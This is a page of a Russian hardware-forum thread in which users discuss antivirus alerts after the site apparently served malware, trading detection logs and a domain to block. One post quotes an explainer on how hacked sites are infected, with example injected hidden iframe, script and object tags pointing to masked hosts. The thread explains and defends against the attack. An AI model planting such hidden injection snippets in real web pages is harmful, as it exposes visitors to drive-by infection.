Часовой пояс: UTC + 3 часа

Начать новую тему Новая тема / Эта тема закрыта, вы не можете редактировать и оставлять сообщения в ней. Закрыто  Сообщений: 40 • Страница 2 из 2<  1  2
  Пред. тема | След. тема 
В случае проблем с отображением форума, отключите блокировщик рекламы
Автор Сообщение

Member
Статус: Не в сети
I.N. Одна просьба. Когда инцидент будет изучен, можно огласить результаты? Ну очень интересно узнать - кто виноват (если кто-то вообще виновен).

Партнер

Moderator
Фото: 546
Airt_Reg писал(а):
I.N. писал(а):
Тема открыта.

Интересно с какой теперь целью если проблема решена?

Если вдруг возникнет ещё с какой-либо статьёй.

Clay Allison писал(а):
I.N. Одна просьба. Когда инцидент будет изучен, можно огласить результаты? Ну очень интересно узнать - кто виноват (если кто-то вообще виновен).

Это уже не ко мне.

Advanced member
У меня на последнюю статью (от31.12) по-прежнему ругается. Но только на нее теперь.

member+
Для тех кто режет рекламу и не имеет антивиря поставьте фильтр на "http://trafficroad.org/*" и не бойтесь пока что ничего. А вообще что-то мне подсказывает что этот вирус опасен только для пользователей IE (информация неподтверждённая, я могу ошибаться)

Member
I.N. писал(а):
Это уже не ко мне.
А к кому?

member+
gf34ggg55 писал(а):
всем пихануть рекламу в наглую

Нет просто положить ламерам всю систему, чтоб юзеров (которые не умеют от вирусов защищаться) выгнать, тут территория оверов (читай специалистов) а не чайников :)

ЗЫ предупреждение за офтоп можете давать, просто не мог промолчать.

Заблокирован
Заблокирован
Зашел снова на эти страницы, чисто все, антивирь молчит.

Junior
У меня avast до сих пор ругается на эту. http://www.overclockers.ru/lab/35663.shtml :insane:

Advanced member
Фото: 56
Aeg писал(а):
02.01.2010 14:44:22 Защита в режиме реального времени файл C:\WINDOWS\system32\drivers\zgcascqab5.sys Win32/Rootkit.Agent.NPK троянская программа очищен удалением - изолирован NT AUTHORITY\SYSTEM Событие произошло в новом файле, созданном следующим приложением: C:\DOCUME~1\Admin\LOCALS~1\Temp\hiddenForm.exe.

Венда такая венда :tooth: Пропатчил бы хоть, чтобы не позориться.

RX 6900XT GAMING OC 16G+Bykski WB
macOS Sequia 15.5

Member
Bigvirus писал(а):
пряздрявляю

у меня опера, отключено все лишнее ;)

Member
Помнится все орали во всю глотку, что Аваст г... антивирь...Вот вам и ваши касперы с нодами... :haha: Профукали вирусяку... :lol: Аваст - рулит!!! :dance:

Member
Operaman писал(а):
У меня avast до сих пор ругается на эту. http://www.overclockers.ru/lab/35663.shtml :insane:

Ага.

Может тему немного переименовать, а то не очень понятно что за троян такой :tooth:

Advanced guest
Походу ругается-не ругается зависит еще и от дырявости винды. У меня сейчас мелкомягкий антивирь (судя по вирустотал он заразу знает) промолчал, но я ничего и не поймал при этом. Просто все заплатки стоят, UAC включен, IE в своем "безопасном режиме" (т.е. по правам в системе обрезан по самое нехочу).
А когда антивирь находит что-то, но делает это уже с успешно проинсталлированным в system32\drivers файлом, тут есть над чем задуматься...

Member
Фото: 0
у меня тоже в новостях и в статье про азот и 960-ые - вирус типа. каспер 2009 ругается.

Member
Кстати, а что за "паук" лазит по конференции? Вроде такого раньше не было... :oops: Что это? #77

Junior
Цитата:
У меня avast до сих пор ругается на эту. http://www.overclockers.ru/lab/35663.shtml

О, поправили. Интересно, в чём была причина?

Заблокирован
Заблокирован
Operaman писал(а):
Интересно, в чём была причина

Вот типа того
Цитата:
Как происходит заражение сайта

Специальная программа заходит на каждый сервер из базы с помощью похищенного логина и пароля. Там она ищет файлы стандартные для большинства веб-сайтов, например, ‘index.php’, ‘index.asp’, ‘index.html’ и т.д., и меняет их содержимое так, чтобы отображение такой страницы на пользовательском компьютере могло вызвать его заражение.

Так как списки для FTP доступа могут многократно перепродаваться на закрытых форумах, заражение одних и тех же сайтов может происходить разными вирусами и не один раз.
Как выглядит вредоносный код

Примеры. Вредоносный код может добавлять к страницам такие конструкции:

<iframe src=”http: //****-*******.net/?click=12078406″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
или

<script src=http: //www.****.ru/script.js></script>
или такой

<object data=’http: //***.name/in.cgi?2 ‘ type=’text/html’ style=’display:none’></object>
А баннерная система для взрослых может использовать такой код:

<script language=”javascript”>
var xxxwidth= 300;
var xxxheight= 100;
var xxxbgcolor= ”;
var xxxcolor= ‘blue’;
var xxxsize= 16;
var xxxcount= 5;
</script>
<script language=”javascript” src=”http: //*****-*****.ru/load.php?id=330″></script>
Маскировка вредоносного кода

Часто авторы кода стараются затруднить его анализ и обнаружение, используя специальные техники, называемые обфускацией (от англ. obfuscation).
Почему происходит заражение? Казалось бы, страница просто загружается браузером и отображается. Если бы в программах не было ошибок, то загрузка и отображение были бы всегда безопасными действиями. К сожалению, такие ошибки (уязвимости) есть, они и используются злоумышленниками. Хотя компании регулярно выпускают обновления для своих продуктов, злоумышленники постоянно исследуют их в поиске новых уязвимостей.
Вредоносный код на загружаемой пользователем странице, выполняясь, использует уязвимости приложений, что позволяет злоумышленникам получить полный контроль над атакуемым компьютером. Специально написанная для этого программа или скрипт называется эксплойт (от англ. exploit). Эксплойты для разных типов уязвимостей объединяют в наборы (exploit packs) для повышения вероятности заражения компьютера жертвы. Для атаки используются уязвимости как в самом браузере, так и в других приложениях и дополнениях (например, в плагинах для просмотра PDF и flash).

Member
Clay Allison писал(а):
Кстати, а что за "паук" лазит по конференции?

http://www.baidu.com - китайский гугл.

Advanced member
я вот не понимаю, на оверклокерсе модно что ли стало игнорировать предупреждения модераторов?!
I.N. писал(а):
Любой бред и флуд будет отстреливаться очень жёстко.

выбор антивируса обсудили, патчи на виндовс, отключение всего лишнего в браузерах, пауков и китайские гуглы .... это вам не Флейм!!

ждите реакции модераторов раздела. :gun:

Advanced member
Если руководство сайта сочтёт нужным объяснить что-либо, это в его компетенции. Спасибо автору темы и другим участникам, сообщившим о проблеме, предмета для дальнейшего обсуждения не вижу, тема закрыта.

Начать новую тему Новая тема / Эта тема закрыта, вы не можете редактировать и оставлять сообщения в ней. Закрыто  Сообщений: 40 • Страница 2 из 2<  1  2
-

Часовой пояс: UTC + 3 часа